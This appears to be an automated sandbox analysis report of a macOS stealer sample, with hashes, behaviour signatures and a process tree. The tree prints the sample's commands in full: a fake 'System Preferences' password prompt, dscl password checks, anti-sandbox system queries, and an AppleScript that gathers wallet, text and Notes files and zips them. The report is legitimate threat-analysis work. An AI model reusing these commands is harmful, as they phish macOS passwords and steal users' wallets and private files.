Analysis
-
max time kernel
104s -
max time network
140s -
platform
macos-10.15_amd64 -
resource
macos-20240711.1-en -
resource tags
arch:amd64arch:i386image:macos-20240711.1-enkernel:19b77alocale:en-usos:macos-10.15-amd64system -
submitted
02-08-2024 18:01
Static task
static1
General
-
Target
0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho
-
Size
436KB
-
MD5
d14dd58a8382407676d4a8f00383d068
-
SHA1
0a34331ec2ad1b23ad22c131ee41b27135d9e413
-
SHA256
0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a
-
SHA512
f7458e7dc4116dc159bd90fc2cb099128d8dba255e5a365fa4db0f8bc89a5a2931dda104059dd3a83badb5b92aa93a8cb58663d7200a486a81a7cad032ac5b00
-
SSDEEP
6144:Ie9S+e5rQkIVSA0qnm3YFVr+cYJv5DSV5QMyuhVQDmXEboFG7gPe1K2G4MavHjij:IT5rQkIwA0QFVyca0Ld9ci+FxFjsP
Malware Config
Signatures
-
Queries the macOS version information. 1 TTPs 2 IoCs
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
ioc Process sh -c sw_vers Process not Found sw_vers Process not Found -
System Checks 1 TTPs 2 IoCs
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox.
ioc Process sh -c "system_profiler SPHardwareDataType" Process not Found system_profiler SPHardwareDataType Process not Found -
AppleScript 1 TTPs 4 IoCs
AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.
ioc Process osascript -e "tell application \"Finder\" set desktopFolder to path to desktop folder set documentsFolder to path to documents folder set srcFiles to every file of desktopFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set docsFiles to every file of documentsFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set allFiles to srcFiles & docsFiles if exists POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\" then set allFiles to allFiles & {POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\"} end if repeat with aFile in allFiles duplicate aFile to POSIX file \"/Users/run/152742989/FileGrabber\" with replacing end repeat end tell" Process not Found sh -c "osascript -e 'display dialog \"macOS needs to access System settings Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'" Process not Found osascript -e "display dialog \"macOS needs to access System settings Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬" Process not Found sh -c "osascript -e 'tell application \"Finder\" set desktopFolder to path to desktop folder set documentsFolder to path to documents folder set srcFiles to every file of desktopFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set docsFiles to every file of documentsFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set allFiles to srcFiles & docsFiles if exists POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\" then set allFiles to allFiles & {POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\"} end if repeat with aFile in allFiles duplicate aFile to POSIX file \"/Users/run/152742989/FileGrabber\" with replacing end repeat end tell' > /dev/null 2>&1" Process not Found -
Resource Forking 1 TTPs 1 IoCs
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.
ioc Process /System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper Process not Found
Processes
-
/bin/shsh -c "sudo /bin/zsh -c \"/Users/run/0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho\""1⤵PID:481
-
/bin/bashsh -c "sudo /bin/zsh -c \"/Users/run/0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho\""1⤵PID:481
-
/usr/bin/sudosudo /bin/zsh -c /Users/run/0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho1⤵PID:481
-
/bin/zsh/bin/zsh -c /Users/run/0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho2⤵PID:485
-
-
/Users/run/0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho/Users/run/0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho2⤵PID:485
-
-
/usr/libexec/xpcproxyxpcproxy "com.apple.xpc.launchd.oneshot.0x10000001.Problem Reporter"1⤵PID:515
-
/System/Library/CoreServices/Problem Reporter.app/Contents/MacOS/Problem Reporter"/System/Library/CoreServices/Problem Reporter.app/Contents/MacOS/Problem Reporter" -psn_0_1515891⤵PID:515
-
/bin/launchctl/bin/launchctl kill SIGTERM system/com.microsoft.OneDriveUpdaterDaemon1⤵PID:533
-
/bin/launchctl/bin/launchctl kill SIGTERM system/com.microsoft.OneDriveStandaloneUpdaterDaemon1⤵PID:534
-
/usr/libexec/xpcproxyxpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E1⤵PID:542
-
/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService1⤵PID:542
-
/usr/libexec/xpcproxyxpcproxy com.apple.xpc.launchd.oneshot.0x10000002.0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho1⤵PID:548
-
/Users/run/0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho/Users/run/0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho -psn_0_1597831⤵PID:548
-
/usr/libexec/xpcproxyxpcproxy com.apple.metadata.mdwrite1⤵PID:549
-
/bin/shsh -c "dscl /Local/Default -authonly run \"\""1⤵PID:550
-
/bin/bashsh -c "dscl /Local/Default -authonly run \"\""1⤵PID:550
-
/usr/bin/dscldscl /Local/Default -authonly run1⤵PID:550
-
/bin/shsh -c "osascript -e 'display dialog \"macOS needs to access System settings Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"1⤵PID:551
-
/bin/bashsh -c "osascript -e 'display dialog \"macOS needs to access System settings Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"1⤵PID:551
-
/usr/bin/osascriptosascript -e "display dialog \"macOS needs to access System settings Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬"1⤵PID:551
-
/usr/libexec/xpcproxyxpcproxy com.apple.ReportMemoryException1⤵PID:555
-
/usr/libexec/ReportMemoryException/usr/libexec/ReportMemoryException1⤵PID:555
-
/bin/shsh -c "dscl /Local/Default -authonly run root"1⤵PID:556
-
/bin/bashsh -c "dscl /Local/Default -authonly run root"1⤵PID:556
-
/usr/bin/dscldscl /Local/Default -authonly run root1⤵PID:556
-
/bin/shsh -c "system_profiler SPHardwareDataType"1⤵PID:557
-
/bin/bashsh -c "system_profiler SPHardwareDataType"1⤵PID:557
-
/usr/sbin/system_profilersystem_profiler SPHardwareDataType1⤵PID:557
-
/bin/shsh -c "system_profiler SPDisplaysDataType"1⤵PID:559
-
/bin/bashsh -c "system_profiler SPDisplaysDataType"1⤵PID:559
-
/usr/sbin/system_profilersystem_profiler SPDisplaysDataType1⤵PID:559
-
/bin/shsh -c sw_vers1⤵PID:561
-
/bin/bashsh -c sw_vers1⤵PID:561
-
/usr/bin/sw_verssw_vers1⤵PID:561
-
/bin/shsh -c "osascript -e 'tell application \"Finder\" set desktopFolder to path to desktop folder set documentsFolder to path to documents folder set srcFiles to every file of desktopFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set docsFiles to every file of documentsFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set allFiles to srcFiles & docsFiles if exists POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\" then set allFiles to allFiles & {POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\"} end if repeat with aFile in allFiles duplicate aFile to POSIX file \"/Users/run/152742989/FileGrabber\" with replacing end repeat end tell' > /dev/null 2>&1"1⤵PID:562
-
/bin/bashsh -c "osascript -e 'tell application \"Finder\" set desktopFolder to path to desktop folder set documentsFolder to path to documents folder set srcFiles to every file of desktopFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set docsFiles to every file of documentsFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set allFiles to srcFiles & docsFiles if exists POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\" then set allFiles to allFiles & {POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\"} end if repeat with aFile in allFiles duplicate aFile to POSIX file \"/Users/run/152742989/FileGrabber\" with replacing end repeat end tell' > /dev/null 2>&1"1⤵PID:562
-
/usr/bin/osascriptosascript -e "tell application \"Finder\" set desktopFolder to path to desktop folder set documentsFolder to path to documents folder set srcFiles to every file of desktopFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set docsFiles to every file of documentsFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set allFiles to srcFiles & docsFiles if exists POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\" then set allFiles to allFiles & {POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\"} end if repeat with aFile in allFiles duplicate aFile to POSIX file \"/Users/run/152742989/FileGrabber\" with replacing end repeat end tell"2⤵PID:563
-
-
/usr/libexec/xpcproxyxpcproxy com.apple.DesktopServicesHelper.7DDF301E-7638-4EBB-A42C-64D115067DC71⤵PID:567
-
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper1⤵PID:567
-
/bin/shsh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/152742989 /Users/run/152742989.zip --norsrc --noextattr"1⤵PID:568
-
/bin/bashsh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/152742989 /Users/run/152742989.zip --norsrc --noextattr"1⤵PID:568
-
/usr/bin/dittoditto -c -k --sequesterRsrc --keepParent /Users/run/152742989 /Users/run/152742989.zip --norsrc --noextattr1⤵PID:568
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
676B
MD523ced6333bfbe8f6e784cab3a1ed1829
SHA15ff3829d53559afd5052933e05139195b4ae7fc2
SHA256acbac05d02ecfb383ffeaad7e6a2449d81f3d8b3198b029c0d9488c0d0043a62
SHA5129d9957d0df62b2327f2808ed39fc567b46f408c923e633c376b41c3817c5233a423158b79bc52c1fd874ec25be5569128931a6ae8cd3701f7f42c63507a37d7c
-
Filesize
90KB
MD54e9060f76c1cb5b54005dc6640a58f0d
SHA104a1e6791ae55612d9b63f23ccb37eec398b3d27
SHA2565b6dd3116e1d3ecbf6d07ecfc03f1537ab00ce91336cc7c6cddda6df0c9984d3
SHA512be921e02bb810fb867c1de3e3c2a9c3b04c84188d6a9eae60b73558bd4748c1451161da8fba2c8e74f225be4b8a6f0e98276fe1e397b0083fcbbd4ebdf32e148
-
Filesize
20KB
MD52a3fa78b5f55b529a2698ad187c80204
SHA1cbbda35512038de511ac23b0aed12e9e86bcc796
SHA256d52ad17cc5096119732f06311ef2e25005c2a00f551c9684e2d655cbc846455b
SHA512e9b113ec0c6a888e059cf625b0bfb128d11a55970fed12df30848c9f836c5f36b2660abb4e2a820e7dedd6f0ead312edec1c6cd645f14091d98b42f696bda9ab
-
Filesize
40KB
MD5b6914d8e5cb470236eceed8d6f8b4fb7
SHA1cdff8880e9fa7630fc8d57af4669365b5ab29b60
SHA25645bda2415419c24d2526ae60cae5ee1d66bc8d2cc986bb9e94c0f3c414af06c1
SHA5121c491cfeb2b883ed20a43e16d7bf620520f4b770c8727ffb83e02554aa6aa54def4732460bcff82014050f7a1fba38e01f5570cacfbfcef6da6f2f795dc56ee7
-
Filesize
96KB
MD57357bcc0190ae9659f882b67dc9f5627
SHA13085ef48c757fd6e21f93ed4bf061b22557f49de
SHA25686e8e7c7bcc0b1c022693bdccdb116410eb8fac871a21e49be995be9642797db
SHA5123f93e76133598fa537576237c1198538861e614e5bc8e50549992b8885d493c385733a7f47c6d18c0d90a9ecd9b6b265bd4fd9c25be83224d5b5baa6c0828c91
-
Filesize
1KB
MD56d3ab465c72882304f2a113936881f79
SHA1c8cacdcf241e88fae285aec4c378fc3d1f806d04
SHA25696ea6b98341d29912de016bfcdec019fceeffb027ab7be08f7833603b5be43a9
SHA5122bf8d2ac1fef35ac5304a86a01fc43f5f74c9d7dac8098c509315d310505f6b9537f401e0f54b8e3064e0142f2af322eeaba2b226dec354aeeb007ffa73ac7b1
-
Filesize
112KB
MD5cd67d104f366d3edc60d45f8cf730335
SHA1048b8101be8ffdc24eb3260c8b6591e6308093c4
SHA25658b2e590d0cdb1d333d3c6c48a7bc3492ec20016db7e0838a4f52633c14d4e69
SHA5129f70fae1f2a4cbb91fe8e07b4ca02a754f8d9a9b2325b2d8fc880dd3a3c88f129410801ddff682c03c6954380d09f4b21aeb041d44927988c06efbbe3fab1f98
-
Filesize
4B
MD563a9f0ea7bb98050796b649e85481845
SHA1dc76e9f0c0006e8f919e0c515c66dbba3982f785
SHA2564813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2
SHA51299adc231b045331e514a516b4b7680f588e3823213abe901738bc3ad67b2f6fcb3c64efb93d18002588d3ccc1a49efbae1ce20cb43df36b38651f11fa75678e8